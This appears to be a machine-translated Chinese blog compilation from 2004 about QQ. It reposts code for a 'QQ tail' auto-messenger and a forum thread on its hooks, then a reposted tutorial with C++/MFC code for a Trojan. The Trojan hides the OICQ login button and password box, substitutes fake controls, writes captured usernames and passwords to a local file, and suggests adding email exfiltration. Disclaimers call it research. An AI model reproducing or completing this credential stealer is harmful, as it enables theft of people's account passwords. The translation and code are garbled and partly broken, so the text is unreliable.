Timer1.enabled: = not timer1.enable;
IF Timer1.enabled Then
Button1.caption: = 'Stop'
Else
Button1.caption: = 'start';
END;
Procedure TFORM1.BUTTON2CLICK (Sender: TOBJECT);
Begin
Timer1.interval: = strt1.text);
END;
End.
Summary: Only the main function of the QQ message is automatically sent, which may be different from the principle of QQ tail (I don't know), but it should be almost the same. If you want to make the user feel unusual, you have to change it, don't send it automatically, but when you click the "Send" button, add your text. Such words can intercept the click message of the "Send" button, and then add the text in the above method, and then turn the message to the program. As for how to make it a virus, you will copy it yourself, self-hide, etc., that is another topic, there is not much talks here.
Another: This article only uses technology research, I hope everyone don't take it to quail eggs. If there is a consequence, I am not responsible. Welcome everyone to believe.
Author: Wu Chong-ho
Email: wuqiu@regalcyber.com
Homepage: http://www.chuanghao.com
Author Blog: http://blog.9cbs.Net/wuqiu/
delete
#
Reply: QQ information
2004-10-21 8:43 AM
Bing314
Http://community.9cbs.net/expert/topic/3374/3374436.xml?temp=.412533
Main topic: Why don't this hook function? Realization of a QQ tail
Servers: zjpixyniannian () 等 级:
Credit value: 98
Community: VC / MFC Process / Thread / DLL
Question points: 30
Reply number: 5
Published: 2004-9-15 12:33:07
This is a program that mimics the QQ tail, which is loaded uploaded from 9CBS, but I am running, I don't succeed, the problem is that although there are two hooks, the hook function is not running.
The following is the code file where the hook function is located. "
Reply to: SteveCrisewu (Moon Knight) () Reputation: 91 2004-9-18 14:15:38 Score: 10
QQ version issues, the author tracks the QQ2003 version
If you are QQ2004, you need to make a slight modification of the author looks for the g_rich handle.
You can go to me blog to see, blog.9cbs.net / stevecrisewu
An example
Reply to: zjpixyniannian () () Reputation: 98 2004-9-20 14:41:40 Score: 0
The 2004 version should be made up of this bug. It should be handled for WM_Paste. I can successfully apply this message on other programs. thank you all.
delete
#
Reply: QQ information
2004-10-21 9:00 AM
Bing314
Stolen beam change column stealing OICQ password
Publisher: Soarlove (enter the soarlove personal column)
Release Date: 2002.08.21
Upgrade: 0
Today, Today: 1
Total browsing: 7302
-------------------------------------------------- ------------------------------
Evaluation Level:
0 users score this article, with average division of 0.0
Affirming: This article is designed to analyze the means of hacker attacks, please do not use for illegal purposes!
The development of the Internet has driven a big leap in the IT world. The hacker activity has also become increasingly rampant, and the attack technique is constantly changing. Various hacker programs are also endless, and the Trojan is more spectating. For example: monitor the keyboard button, replace the login program, etc., now I will introduce another attack method, replace the login program button. This is advisable! Now I will introduce the method.
Take our very familiar OICQ to make an example to see how the procedure is how to steal the column. To replace the button and password box of the OICQ login program, you must first capture the login button and password box handle of the OICQ login program. Haha, if you replace our own buttons and password boxes, don't you think about what to do?
We have to get 4 CWND handles, divided into the other: user number CCOMBOX, user password CEDIT, login button CButton, master dialog handle.
m_hoicq = findwindow (null, "QQ user login");
M_hok = CWnd :: fromHank = CWnd :: fromHandle (M_hoicq-> GetsafehWnd (), NULL, "Button", "Login");
m_hedit = cwnd :: fromHandle (FindWindowEx (m_hoicq-> getsafehwnd (), null, "edit", null);
M_HCOM = CWND :: fromHandle (FindWindowEx (m_hoicq-> getsafehwnd (), null, "combobox", null);
/// above M_hoicq, M_HOK, M_HEDIT, M_HCOM is CWND * type, respectively
With these four handles, the next thing is going to do, now we now generate a button and an edit box. The code cfont * m_font = m_hok-> getFont (); cfont * m_font1 = m_hedit-> getFont ();
CRECT RECT;
CRECT RECT1;
m_hok-> getWindowRect (Rect);
m_hok-> screenToclient (Rect);
m_hedit-> getWindowRect (Rect1);
m_hedit-> screenToclient (Rect1);
Rect.Left = 14;
RECT.TOP = 117;
Rect.bottom = 117;
RECT.Right = 14;
Rect1.Left = 110;
RECT1.TOP = 56;
RECT1.BOTTOM = 56;
RECT1.Right = 110;
m_hok-> showwindow (sw_hide); // Hide Login button
m_hedit-> showwindow (sw_hide); // Silver password box
IF (M_Button.create ("Login", WS_CHILD | WS_VISIBLE | WS_TABSTOP | BS_DEFPUSHBUTTON, RECT, M_HOICQ, IDC_StartButton == false)
MessageBox ("error");
m_button.setfont (m_font, true);
M_Button.SetWnd (this);
m_button.setid (IDC_StartButton);
IF (m_edit.createex (0x204, "edit", "", 0x500100A0, RECT1, M_HOICQ, IDC_MYEDIT) == false)
MessageBox ("Error1");
m_edit.setfont (m_font1, true);
m_edit.setfocus ();
m_edit.setwnd (this);
M_Button in the above code is a CMYBUTTON type variable, m_edit is a CMYEDIT type variable, please continue to look down.
These two controls are generated! But the light generates two controls is still useless. We have to let two controls tell us when to press the carriage return, when can I click the mouse left button. Then you have to do it for Edit, button. Generate two derived CMYEDIT, CMYBUTTON, generate WM_LButton, PretranslateMessage, which generates WM_LButton, and processes the corresponding button event. And the communication incident sent a message to my master dialog, then get the handle of my dialog, generate functions in two derived classes
SetWnd (CWND * PWND) is used to inform the window handle of the main dialog.
Enter in CMYEDIT's PretranslateMessage (MSG * PMSG)
IF (PMSG-> Message == WM_KeyDown)
{
IF (PMSG-> wparam == vk_return)
M_Wnd-> SendMessage (WM_Buttondown, 0, 0);
}
Enter in CMyButton's online onlbuttonup (uint nflags, cpoint points)
M_Wnd-> SendMessage (WM_Buttondown, 0, 0);
The above sends a message to my dialog, I have to put the message, clean and beautiful, this talent will not know that my Trojan is secretly monitors them CSTRING Password, CC;
Char loginname [20];
Memset (Loginname, 0, 20);
:: SendMessage (m_hcom-> getsafehwnd (), wm_gettext, 20, (lparam) Loginname;
m_edit.getWindowText (Password);
m_edit.showwindow (sw_hide);
m_hedit-> showwindow;
M_hok-> showwindow; Sw_SHOW
CC = 0x0d;
CC = 0x0a;
CFILEFIND M_FIND;
CFILE M_FILE;
IF (! m_find.findfile ("c: //oicqlog.dat"))))
M_File.Open ("c: //oicqlog.dat", cfile :: modecreate | cfile :: modewrite, null;
Else
{
m_file.open ("c: //oicqlog.dat", cfile :: modewrite;
m_file.seektoend ();
}
m_file.write (cc, cc.getlength);
m_file.write (loginname, sizeof (loginname));
m_file.write (cc, cc.getlength);
m_file.write (Password, Password.getLength ());
m_file.close ();
m_hedit-> setfocus ();
Char * ee = password.getBuffer (Password.getLength ());
:: SendMessage (m_hedit-> getsafehwnd (), WM_SETTEXT, 20, (LPARAM) EE);
KeyBD_Event (VK_RETURN, 0, 0);
KeyBD_Event (VK_RETURN, 0, 2, 0);
Return True;
Ok, a simple Trojan is written. If you add Email's function, it will become more perfect. The specific details can analyze the source code provided, the code can set the Email mailbox, SMTP server, once Send quantity, password file location.
Simple usage of the sample program: Press the "Capture" button After the program is hidden, when the QQ is opened, the button on QQ has been replaced, and the login information is recorded in the password file you set. Do not use this code for illegal purposes.
